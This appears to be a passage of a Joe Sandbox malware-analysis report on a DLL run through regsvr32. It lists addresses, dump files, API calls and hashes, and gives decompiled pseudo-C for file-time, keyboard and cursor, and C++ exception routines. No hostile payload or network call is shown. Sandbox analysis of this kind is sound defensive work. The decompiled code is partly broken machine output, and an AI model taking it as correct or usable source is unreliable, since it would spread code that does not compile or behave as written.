                                                                              0x00000000
                                                                              0x10051b9c
                                                                              0x10051b95
                                                                              0x10051b97
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051b97
                                                                              0x10051b82
                                                                              0x10051b4a
                                                                              0x00000000
                                                                              0x10051b4a
                                                                              0x10051b3a
                                                                              0x00000000
                                                                              0x10051b3a
                                                                              0x10051b2e
                                                                              0x00000000
                                                                              0x10051bdc
                                                                              0x10051bdc
                                                                              0x10051be4
                                                                              0x10051be7
                                                                              0x10051beb
                                                                              0x10051bf0
                                                                              0x10051bf6
                                                                              0x10051bf8
                                                                              0x10051bfb
                                                                              0x00000000
                                                                              0x10051c07
                                                                              0x10051c09
                                                                              0x10051c10
                                                                              0x10051c13
                                                                              0x10051c16
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051c1c
                                                                              0x10051c2b
                                                                              0x10051c32
                                                                              0x10051c62
                                                                              0x10051c67
                                                                              0x10051c6a
                                                                              0x10051c6d
                                                                              0x10051c79
                                                                              0x10051c79
                                                                              0x10051c7c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051c82
                                                                              0x10051c91
                                                                              0x10051c94
                                                                              0x10051c99
                                                                              0x10051c9e
                                                                              0x10051ca4
                                                                              0x10051ca6
                                                                              0x10051d9c
                                                                              0x10051d9c
                                                                              0x10051da3
                                                                              0x10051da3
                                                                              0x10051da7
                                                                              0x10051da9
                                                                              0x10051da9
                                                                              0x00000000
                                                                              0x10051dae
                                                                              0x10051cb0
                                                                              0x10051cbc
                                                                              0x10051cc2
                                                                              0x10051cc6
                                                                              0x10051ccb
                                                                              0x10051cd1
                                                                              0x10051cd3
                                                                              0x10051cd6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051cde
                                                                              0x10051ce5
                                                                              0x10051ce8
                                                                              0x10051cec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051cf2
                                                                              0x10051cf7
                                                                              0x10051cfe
                                                                              0x10051d2a
                                                                              0x10051d2f
                                                                              0x10051d32
                                                                              0x10051d35
                                                                              0x10051d41
                                                                              0x10051d41
                                                                              0x10051d44
                                                                              0x10051d46
                                                                              0x10051d55
                                                                              0x10051d58
                                                                              0x10051d5d
                                                                              0x10051d62
                                                                              0x10051d68
                                                                              0x10051d6a
                                                                              0x10051d6f
                                                                              0x10051d72
                                                                              0x10051d78
                                                                              0x10051d7d
                                                                              0x10051d88
                                                                              0x10051d88
                                                                              0x10051d8a
                                                                              0x10051d91
                                                                              0x10051d91
                                                                              0x10051d95
                                                                              0x10051d97
                                                                              0x10051d97
                                                                              0x10051d95
                                                                              0x00000000
                                                                              0x10051d44
                                                                              0x10051d37
                                                                              0x10051d3d
                                                                              0x10051d3d
                                                                              0x10051d3d
                                                                              0x00000000
                                                                              0x10051d3d
                                                                              0x10051d00
                                                                              0x10051d04
                                                                              0x10051d07
                                                                              0x10051d09
                                                                              0x10051d09
                                                                              0x10051d0c
                                                                              0x10051d10
                                                                              0x10051d15
                                                                              0x10051d18
                                                                              0x10051d1d
                                                                              0x10051d20
                                                                              0x00000000
                                                                              0x10051d22
                                                                              0x10051d22
                                                                              0x00000000
                                                                              0x10051d22
                                                                              0x10051d20
                                                                              0x10051c6f
                                                                              0x10051c75
                                                                              0x10051c75
                                                                              0x10051c75
                                                                              0x00000000
                                                                              0x10051c75
                                                                              0x10051c34
                                                                              0x10051c34
                                                                              0x10051c38
                                                                              0x10051c3b
                                                                              0x10051c3d
                                                                              0x10051c3d
                                                                              0x10051c40
                                                                              0x10051c44
                                                                              0x10051c49
                                                                              0x10051c4c
                                                                              0x10051c51
                                                                              0x10051c54
                                                                              0x00000000
                                                                              0x10051c5a
                                                                              0x10051c5a
                                                                              0x00000000
                                                                              0x10051c5a
                                                                              0x10051c54
                                                                              0x10051bfb
                                                                              0x10051b1f
                                                                              0x10051aed
                                                                              0x10051aba
                                                                              0x10051abc
                                                                              0x10051ac0
                                                                              0x10051ac0
                                                                              0x10051ac6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051ac8
                                                                              0x10051ace
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051ad0
                                                                              0x00000000
                                                                              0x10051ad0
                                                                              0x10051ad3
                                                                              0x10051ad6
                                                                              0x10051ad9
                                                                              0x00000000
                                                                              0x10051ad9
                                                                              0x10051a7d
                                                                              0x10051a80
                                                                              0x10051a83
                                                                              0x10051a83
                                                                              0x10051a89
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051a8b
                                                                              0x10051a91
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10051a93
                                                                              0x00000000
                                                                              0x10051a93
                                                                              0x10051a9b
                                                                              0x10051a9e
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                              • String ID:
                                                                              • API String ID: 1773772771-0
                                                                              • Opcode ID: 9dde9463048309dc8dd8ed6792cf56371fefab4ed9eda028bef5ffe4a8abdff6
                                                                              • Instruction ID: ff9b88213390c6d82264700eaf76c7309a5a2b762db1900335a7b24ccb4faca2
                                                                              • Opcode Fuzzy Hash: 9dde9463048309dc8dd8ed6792cf56371fefab4ed9eda028bef5ffe4a8abdff6
                                                                              • Instruction Fuzzy Hash: F1D126367047C08AEB21CF21E8007D93BE6F748BE8F454A15DEA947B84EB78D949C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100312B0 Relevance: 13.6, APIs: 9, Instructions: 131timeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 28%
                                                                              			E100312B0(void* __ecx, intOrPtr* __rax, void* __rcx, long long* __rdx, void* __r8, void* __r10, long long __r11, char _a8, char _a16, char _a24, char _a32) {
				void* _v56;
				void* _t39;
				void* _t41;
				signed char _t46;
				void* _t72;
				intOrPtr* _t74;
				long long* _t78;
				void* _t106;
				long long _t107;
				void* _t108;
				void* _t115;
				long long _t116;

				_t116 = __r11;
				_t115 = __r10;
				_t74 = __rax;
				_t78 = __rdx;
				_t106 = __rcx;
				r8d = 0x230;
				E1003A240(_t39, __ecx, 0, __rdx, __rdx, __r8);
				_t41 = E10038D40(_t74, __rdx + 0x22, __rdx,  *((intOrPtr*)(__rcx + 0x18)), 0xffffffff);
				if(_t41 == 0) {
					L8:
					_t72 =  *((intOrPtr*)(_t106 + 8)) -  *0x1005c4c0; // 0xffffffffffffffff
					if(_t72 == 0) {
						L31:
						return 1;
					}
					if(GetFileTime() != 0) {
						r11d = GetFileSize();
						 *((long long*)(_t78 + 0x18)) = _t116;
						if(_t116 == _t108) {
							goto L10;
						}
						if( *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x18)) - 0x10)) != 0) {
							_t46 = GetFileAttributesW();
							_t61 =  ==  ? 0 : _t46 & 0x000000ff;
							 *((char*)(_t78 + 0x20)) =  ==  ? 0 : _t46 & 0x000000ff;
						} else {
							 *((intOrPtr*)(_t78 + 0x20)) = sil;
						}
						if(FileTimeToLocalFileTime() == 0 || FileTimeToSystemTime() == 0) {
							 *_t78 = _t107;
						} else {
							r8d = 0xffffffff;
							E10030F2C(0,  &_a32,  &_a8, _t115);
							 *_t78 =  *_t74;
						}
						if(FileTimeToLocalFileTime() == 0 || FileTimeToSystemTime() == 0) {
							 *((long long*)(_t78 + 0x10)) = _t107;
						} else {
							r8d = 0xffffffff;
							E10030F2C(0,  &_a32,  &_a16, _t115);
							_t74 =  *_t74;
							 *((long long*)(_t78 + 0x10)) = _t74;
						}
						if(FileTimeToLocalFileTime() == 0 || FileTimeToSystemTime() == 0) {
							 *((long long*)(_t78 + 8)) = _t107;
						} else {
							r8d = 0xffffffff;
							E10030F2C(0,  &_a32,  &_a24, _t115);
							 *((long long*)(_t78 + 8)) =  *_t74;
						}
						if( *_t78 == _t107) {
							 *_t78 =  *((intOrPtr*)(_t78 + 8));
						}
						if( *((intOrPtr*)(_t78 + 0x10)) == _t107) {
							 *((long long*)(_t78 + 0x10)) =  *((intOrPtr*)(_t78 + 8));
						}
						goto L31;
					}
					L10:
					return 0;
				}
				if(_t41 == 0xc) {
					L7:
					E100164FC();
					asm("int3");
					goto L8;
				}
				if(_t41 == 0x16 || _t41 == 0x22) {
					L6:
					E10016544();
					asm("int3");
					goto L7;
				} else {
					if(_t41 == 0x50) {
						goto L8;
					}
					E10016544();
					asm("int3");
					goto L6;
				}
			}















                                                                              0x100312b0
                                                                              0x100312b0
                                                                              0x100312b0
                                                                              0x100312b9
                                                                              0x100312bc
                                                                              0x100312bf
                                                                              0x100312ca
                                                                              0x100312e3
                                                                              0x100312ec
                                                                              0x10031314
                                                                              0x10031318
                                                                              0x1003131f
                                                                              0x10031478
                                                                              0x00000000
                                                                              0x10031478
                                                                              0x1003133c
                                                                              0x10031356
                                                                              0x1003135c
                                                                              0x10031360
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10031369
                                                                              0x10031371
                                                                              0x1003137c
                                                                              0x1003137f
                                                                              0x1003136b
                                                                              0x1003136b
                                                                              0x1003136b
                                                                              0x10031394
                                                                              0x100313c7
                                                                              0x100313aa
                                                                              0x100313b4
                                                                              0x100313ba
                                                                              0x100313c2
                                                                              0x100313c2
                                                                              0x100313dc
                                                                              0x10031410
                                                                              0x100313f2
                                                                              0x100313fc
                                                                              0x10031402
                                                                              0x10031407
                                                                              0x1003140a
                                                                              0x1003140a
                                                                              0x10031426
                                                                              0x1003145a
                                                                              0x1003143c
                                                                              0x10031446
                                                                              0x1003144c
                                                                              0x10031454
                                                                              0x10031454
                                                                              0x10031461
                                                                              0x10031467
                                                                              0x10031467
                                                                              0x1003146e
                                                                              0x10031474
                                                                              0x10031474
                                                                              0x00000000
                                                                              0x1003146e
                                                                              0x1003133e
                                                                              0x00000000
                                                                              0x1003133e
                                                                              0x100312f1
                                                                              0x1003130e
                                                                              0x1003130e
                                                                              0x10031313
                                                                              0x00000000
                                                                              0x10031313
                                                                              0x100312f6
                                                                              0x10031308
                                                                              0x10031308
                                                                              0x1003130d
                                                                              0x00000000
                                                                              0x100312fd
                                                                              0x10031300
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10031302
                                                                              0x10031307
                                                                              0x00000000
                                                                              0x10031307

                                                                              APIs
                                                                              • GetFileTime.KERNEL32 ref: 10031334
                                                                              • GetFileSize.KERNEL32 ref: 1003134B
                                                                              • GetFileAttributesW.KERNEL32 ref: 10031371
                                                                              • FileTimeToLocalFileTime.KERNEL32 ref: 1003138C
                                                                              • FileTimeToSystemTime.KERNEL32 ref: 100313A0
                                                                              • FileTimeToLocalFileTime.KERNEL32 ref: 100313D4
                                                                              • FileTimeToSystemTime.KERNEL32 ref: 100313E8
                                                                              • FileTimeToLocalFileTime.KERNEL32 ref: 1003141E
                                                                              • FileTimeToSystemTime.KERNEL32 ref: 10031432
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$LocalSystem$AttributesSize
                                                                              • String ID:
                                                                              • API String ID: 3680005166-0
                                                                              • Opcode ID: 12736c8e33b9e4654df808eb61bb0503e6472e0b4021f514ac12bbd370a7b8bb
                                                                              • Instruction ID: 49c409b2fbd94a7e2b24cb824becbb4230eaf8f8bf88a46604babe707cb4e8bc
                                                                              • Opcode Fuzzy Hash: 12736c8e33b9e4654df808eb61bb0503e6472e0b4021f514ac12bbd370a7b8bb
                                                                              • Instruction Fuzzy Hash: F451C332201B4597DB12CF25E8802DD73B1F388FD5F914611EA998BAA8DF78CAD5CB40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100189D0 Relevance: 13.6, APIs: 9, Instructions: 130timekeyboardCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 65%
                                                                              			E100189D0(void* __ebx, void* __edx, void* __esi, long long __rax, intOrPtr* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11, char _a24) {
				int _t22;
				long long _t32;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t82;
				char _t86;
				char* _t87;
				long long _t89;
				long long _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				long long _t97;
				long long _t98;
				void* _t99;

				_t94 = __r9;
				_t93 = __r8;
				_t63 = __rax;
				_t43 = __esi;
				_t40 = __edx;
				_t37 = __ebx;
				_t67 = __rcx;
				_t99 = __rdx;
				_t22 = GetKeyState(??);
				if(_t22 < 0) {
					L33:
					return _t22;
				}
				E1000A5CC(__ebx, 1, __edx, __esi, __rax, __rcx, __rdx, __r8, __r9, __r11);
				_t97 = __rax;
				GetCursorPos(??);
				ScreenToClient(??, ??);
				_t96 =  *_t67;
				_t86 = _a24;
				r8d = 0;
				 *((intOrPtr*)( *_t67 + 0xd8))();
				_t46 = __rax;
				_t90 = __rax;
				if(__rax < 0) {
					_t89 = 0xffffffff;
					 *((long long*)(__rax + 0x98)) = 0xffffffff;
					L18:
					if(_t90 < 0) {
						L27:
						if( *((intOrPtr*)(_t97 + 0x98)) == _t89) {
							KillTimer();
						}
						_t87 = _t89;
						_t22 =  *((intOrPtr*)( *_t67 + 0x2d0))();
						L30:
						if(_t99 != _t87) {
							goto L33;
						}
						_t22 = KillTimer();
						if(_t90 < 0) {
							goto L33;
						}
						return  *((intOrPtr*)( *_t67 + 0x2d0))();
					}
					_t87 =  &_a24;
					ClientToScreen(??, ??);
					_t22 = WindowFromPoint(??);
					_t92 = _t63;
					if(_t63 == 0) {
						L25:
						_t90 = _t89;
						 *((long long*)(_t97 + 0x98)) = _t89;
						L26:
						if(_t90 >= 0) {
							goto L30;
						}
						goto L27;
					}
					if(_t63 ==  *((intOrPtr*)(_t67 + 0x40))) {
						goto L26;
					}
					_t87 = _t63;
					_t22 = IsChild(??, ??);
					if(_t22 != 0) {
						goto L26;
					}
					_t66 =  *((intOrPtr*)(_t97 + 0x78));
					if(_t66 != 0) {
						_t66 =  *((intOrPtr*)(_t66 + 0x40));
					}
					if(_t66 == _t92) {
						goto L26;
					} else {
						goto L25;
					}
				}
				E10013600(__esi, __rax, _t67, _t86, _t96);
				_t98 = __rax;
				if(E10014FAC(__ebx, __edx, __esi, _t46, __rax, _t67, __r8, __r9, _t96) != 0) {
					__eflags = __rax;
					if(__rax == 0) {
						E10016544();
						asm("int3");
					}
					_t32 = E10016184(_t98);
					_t89 = 0xffffffff;
					__eflags = _t32;
					_t90 =  ==  ? 0xffffffff : _t90;
					__eflags = _t90;
					goto L7;
				} else {
					_t89 = 0xffffffff;
					_t90 = 0xffffffff;
					L7:
					_t63 =  *((intOrPtr*)(_t97 + 0x78));
					if(_t63 != 0) {
						_t91 =  *((intOrPtr*)(_t63 + 0x40));
					}
					GetCapture();
					_t82 = _t63;
					E10011808(_t37, _t40, _t63, _t82, _t86, _t93, _t94, _t96);
					if(_t63 != _t67) {
						if(_t63 != 0) {
							_t82 =  *((intOrPtr*)(_t63 + 0x40));
						}
						if(_t82 != _t91) {
							E10013600(_t43, _t63, _t63, _t86, _t96);
							if(_t63 == _t98) {
								_t90 = _t89;
							}
						}
					}
					goto L18;
				}
			}

















                                                                              0x100189d0
                                                                              0x100189d0
                                                                              0x100189d0
                                                                              0x100189d0
                                                                              0x100189d0
                                                                              0x100189d0
                                                                              0x100189df
                                                                              0x100189e7
                                                                              0x100189ea
                                                                              0x100189f3
                                                                              0x10018b95
                                                                              0x10018b95
                                                                              0x10018b95
                                                                              0x100189f9
                                                                              0x10018a03
                                                                              0x10018a06
                                                                              0x10018a15
                                                                              0x10018a1b
                                                                              0x10018a1e
                                                                              0x10018a23
                                                                              0x10018a29
                                                                              0x10018a30
                                                                              0x10018a33
                                                                              0x10018a36
                                                                              0x10018ac8
                                                                              0x10018acf
                                                                              0x10018ad7
                                                                              0x10018ada
                                                                              0x10018b37
                                                                              0x10018b3f
                                                                              0x10018b4a
                                                                              0x10018b4a
                                                                              0x10018b53
                                                                              0x10018b59
                                                                              0x10018b5f
                                                                              0x10018b67
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10018b6d
                                                                              0x10018b76
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10018b81
                                                                              0x10018ae0
                                                                              0x10018ae5
                                                                              0x10018af0
                                                                              0x10018af9
                                                                              0x10018afc
                                                                              0x10018b27
                                                                              0x10018b27
                                                                              0x10018b2a
                                                                              0x10018b32
                                                                              0x10018b35
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10018b35
                                                                              0x10018b05
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10018b07
                                                                              0x10018b0a
                                                                              0x10018b12
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10018b14
                                                                              0x10018b1c
                                                                              0x10018b1e
                                                                              0x10018b1e
                                                                              0x10018b25
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10018b25
                                                                              0x10018a3f
                                                                              0x10018a47
                                                                              0x10018a51
                                                                              0x10018a5f
                                                                              0x10018a62
                                                                              0x10018a64
                                                                              0x10018a69
                                                                              0x10018a69
                                                                              0x10018a6d
                                                                              0x10018a72
                                                                              0x10018a79
                                                                              0x10018a7b
                                                                              0x10018a7b
                                                                              0x00000000
                                                                              0x10018a53
                                                                              0x10018a53
                                                                              0x10018a5a
                                                                              0x10018a7f
                                                                              0x10018a7f
                                                                              0x10018a87
                                                                              0x10018a8d
                                                                              0x10018a8d
                                                                              0x10018a91
                                                                              0x10018a97
                                                                              0x10018a9a
                                                                              0x10018aa2
                                                                              0x10018aa7
                                                                              0x10018aad
                                                                              0x10018aad
                                                                              0x10018ab4
                                                                              0x10018ab9
                                                                              0x10018ac1
                                                                              0x10018ac3
                                                                              0x10018ac3
                                                                              0x10018ac1
                                                                              0x10018ab4
                                                                              0x00000000
                                                                              0x10018aa2

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorForegroundFromLastPointPopupState
                                                                              • String ID:
                                                                              • API String ID: 3566347107-0
                                                                              • Opcode ID: 6ea6421437bbdd5a17f677755fc470cfb5302508a52af8e2b589b7001447274f
                                                                              • Instruction ID: 2a756eb53ff596629f83720c0f52a4e4dcde00384aff1e1139eafd69e4d21d0c
                                                                              • Opcode Fuzzy Hash: 6ea6421437bbdd5a17f677755fc470cfb5302508a52af8e2b589b7001447274f
                                                                              • Instruction Fuzzy Hash: CD41C925706A9182DE45DF22D8847592790FF49FE8F464236DD2E4BB94EF38CAC5C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003FAC0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 419COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 70%
                                                                              			E1003FAC0(signed int __ebx, void* __ecx, void* __esi, void* __ebp, long long __rbx, signed char* __rcx, signed char* __rdx, signed char* __rdi, long long __rsi, signed int* __r8, signed char* __r9, long long __r12, long long __r13, long long __r14, long long __r15) {
				signed int _t147;
				signed int _t150;
				void* _t152;
				void* _t154;
				signed char _t157;
				signed char _t179;
				signed int _t181;
				signed char _t185;
				void* _t197;
				signed char _t199;
				signed int _t204;
				void* _t205;
				intOrPtr _t206;
				intOrPtr _t210;
				void* _t212;
				signed int _t215;
				void* _t216;
				intOrPtr _t218;
				signed int* _t279;
				signed int* _t282;
				signed char* _t286;
				signed int* _t288;
				signed char* _t291;
				signed int* _t315;
				long long _t324;
				signed char* _t326;
				long long _t327;
				signed int* _t328;
				signed int* _t330;
				void* _t331;
				signed char* _t353;
				signed char* _t355;
				signed char* _t357;
				intOrPtr* _t359;
				signed char* _t361;

				_t363 = __r15;
				_t324 = __rsi;
				_t321 = __rdi;
				_t216 = __esi;
				_t205 = __ecx;
				_t204 = __ebx;
				_t330[8] = __r9;
				_t330[6] = __r8;
				_t330[4] = __rdx;
				_t279 = _t330;
				_t331 = _t330 - 0x5a8;
				 *((long long*)(_t279 - 8)) = __rbx;
				 *((long long*)(_t279 - 0x10)) = _t327;
				_t328 =  *((intOrPtr*)(_t331 + 0x5d0));
				 *((long long*)(_t279 - 0x20)) = __rdi;
				 *((long long*)(_t279 - 0x28)) = __r12;
				 *((long long*)(_t279 - 0x30)) = __r13;
				 *((long long*)(_t279 - 0x38)) = __r14;
				 *((long long*)(_t279 - 0x40)) = __r15;
				_t357 = __rdx;
				_t361 = __rcx;
				r15b = 0;
				_t353 = __r9;
				_t284 = __r8;
				 *(_t331 + 0x5b0) = r15b;
				_t147 = E1003E910(_t279, __r8, _t328, __r9, __rdi, __rsi, _t328, __r9);
				_t345 = _t331 + 0x68;
				_t215 = _t147;
				 *(_t331 + 0x58) = _t147;
				E100398D0(_t215, _t279, _t284, __rdx, __r9, _t321, _t324, _t328, _t328, _t331 + 0x68, __r9, __rdx, __rcx, __r15);
				if(_t215 <= E1003EAC0(_t279, __rdx, _t328)) {
					_t338 = _t328;
					_t313 = _t353;
					_t296 = __rdx;
					_t150 = E1003EAC0(_t279, __rdx, _t328);
					_t215 = _t150;
					 *(_t331 + 0x58) = _t150;
				} else {
					r9d = _t215;
					E1003EA60(_t149, _t331 + 0x68, _t328);
					r9d = _t215;
					_t338 = _t328;
					_t313 = _t353;
					_t296 = _t357;
					E1003EA70(_t279, _t284, _t296, _t321, _t328);
				}
				if(_t215 < 0xffffffff || _t215 >= _t328[1]) {
					E100403F0(_t279, _t345, _t357, _t361, _t363);
				}
				if( *_t361 != 0xe06d7363 || _t361[0x18] != 4) {
					L28:
					if( *_t361 != 0xe06d7363 || _t361[0x18] != 4) {
						L88:
						__eflags = _t328[3];
						if(_t328[3] <= 0) {
							goto L85;
						} else {
							__eflags =  *(_t331 + 0x5d8);
							if( *(_t331 + 0x5d8) != 0) {
								E100403C0(_t279, _t296, _t313, _t345, _t357, _t361, _t363);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t284);
								_t286 = _t296;
								_t154 = E10048730(_t216, _t286, _t296, _t313, _t321, _t324, _t328, _t338, _t345);
								 *_t286 = 0x1005deb8;
								return _t154;
							} else {
								_t279 =  *((intOrPtr*)(_t331 + 0x5e8));
								_t345 = _t353;
								_t338 = _t284;
								 *(_t331 + 0x38) = _t279;
								_t313 = _t357;
								 *(_t331 + 0x30) =  *(_t331 + 0x5e0);
								_t296 = _t361;
								 *(_t331 + 0x28) = _t215;
								 *(_t331 + 0x20) = _t328;
								E1003F810(_t205, _t216, _t284, _t361, _t357, _t321, _t324, _t328, _t284, _t353, _t353, _t357, _t361, _t363);
								goto L85;
							}
						}
					} else {
						_t157 = _t361[0x20];
						if(_t157 == 0x19930520 || _t157 == 0x19930521 || _t157 == 0x19930522) {
							if(_t328[3] <= 0) {
								L77:
								if(( *_t328 & 0x1fffffff) >= 0x19930521 && _t328[8] != 0) {
									_t284 = _t328[8];
									E100399F0(_t279);
									_t279 = _t279 + _t328[8];
									if(_t279 != 0) {
										if(_t204 == 0) {
											__eflags = 0;
										} else {
											E100399F0(_t279);
											_t315 = _t279;
											_t279 = _t328[8];
											_t313 = _t315 + _t279;
										}
										_t296 = _t361;
										if(E1003EF00(_t204, _t279, _t284, _t361, _t313, _t321, _t324, _t345, _t353, _t357, _t361, _t363) == 0) {
											E100398D0(_t215, _t279, _t284, _t357, _t353, _t321, _t324, _t328, _t328, _t331 + 0x5b0, _t353, _t357, _t361, _t363);
											_t284 = _t279;
											E1003D060(_t279, _t284, _t357, _t353, _t321, _t324, _t328, _t328, _t353);
											_t338 =  *(_t331 + 0x5c0);
											_t345 = _t284;
											_t313 = _t361;
											_t279[0x44] = _t331 + 0x90;
											_t296 = _t357;
											 *((char*)(_t331 + 0x40)) =  *(_t331 + 0x5d8);
											 *(_t331 + 0x38) = _t353;
											 *(_t331 + 0x30) = _t328;
											 *(_t331 + 0x28) = 0xffffffff;
											 *(_t331 + 0x20) = 0;
											E1003A050(_t284, _t357, _t361, _t321, _t324, _t328,  *(_t331 + 0x5c0), _t284);
										}
									}
								}
							} else {
								r8d =  *(_t331 + 0x5e0);
								 *(_t331 + 0x30) = _t353;
								 *(_t331 + 0x28) = _t331 + 0x54;
								_t279 = _t331 + 0x50;
								r9d = _t215;
								_t313 = _t328;
								_t296 = _t357;
								 *(_t331 + 0x20) = _t279;
								E10039DD0(_t216, _t284, _t328, _t321, _t324, _t328, _t338, _t353, _t357);
								_t206 =  *((intOrPtr*)(_t331 + 0x50));
								_t210 =  *((intOrPtr*)(_t331 + 0x54));
								_t284 = _t279;
								 *(_t331 + 0x60) = _t279;
								if(_t206 >= _t210) {
									goto L77;
								} else {
									 *((long long*)(_t331 + 0x590)) = _t324;
									do {
										if( *_t284 <= _t215 && _t215 <= _t284[1]) {
											E100399F0(_t279);
											r15d = _t284[3];
											_t321 = _t279 + _t284[4];
											if(r15d <= 0) {
												r15b =  *(_t331 + 0x5b0);
											} else {
												do {
													E10039A10(_t279);
													_t57 =  *((intOrPtr*)(_t361[0x30] + 0xc)) + 4; // 0x4
													_t359 = _t279 + _t57;
													E10039A10(_t279);
													_t296 = _t361[0x30];
													_t313 =  *((intOrPtr*)(_t361[0x30] + 0xc));
													_t218 =  *((intOrPtr*)(_t279 +  *((intOrPtr*)(_t361[0x30] + 0xc))));
													if(_t218 <= 0) {
														goto L68;
													} else {
														while(1) {
															E10039A10(_t279);
															_t355 = _t361[0x30];
															_t282 =  *_t359;
															_t326 = _t279 + _t282;
															if(_t321[4] == 0) {
																break;
															}
															_t284 = _t321[4];
															E100399F0(_t282);
															_t282 = _t282 + _t284;
															if(_t282 == 0) {
																break;
															} else {
																if(_t204 == 0) {
																	__eflags = 0;
																} else {
																	_t284 = _t321[4];
																	E100399F0(_t282);
																	_t282 = _t282 + _t284;
																}
																if(_t282[4] == 0) {
																	break;
																} else {
																	if(_t204 == 0) {
																		_t204 = 0;
																		__eflags = 0;
																	} else {
																		E100399F0(_t282);
																		_t284 = _t282 + _t321[4];
																	}
																	E10039A10(_t282);
																	_t296 = _t326[4];
																	_t282 = _t282 + _t326[4];
																	if(_t284 == _t282) {
																		L59:
																		if(( *_t326 & 0x00000002) == 0 || ( *_t321 & 0x00000008) != 0) {
																			_t179 =  *_t355;
																			if((_t179 & 0x00000001) == 0 || ( *_t321 & 0x00000001) != 0) {
																				if((_t179 & 0x00000004) == 0 || ( *_t321 & 0x00000004) != 0) {
																					if((_t179 & 0x00000002) == 0 || ( *_t321 & 0x00000002) != 0) {
																						break;
																					} else {
																						goto L67;
																					}
																				} else {
																					goto L67;
																				}
																			} else {
																				goto L67;
																			}
																		} else {
																			goto L67;
																		}
																	} else {
																		if(_t321[4] == 0) {
																			_t204 = 0;
																			__eflags = 0;
																		} else {
																			E100399F0(_t282);
																			_t284 = _t282 + _t321[4];
																		}
																		E10039A10(_t282);
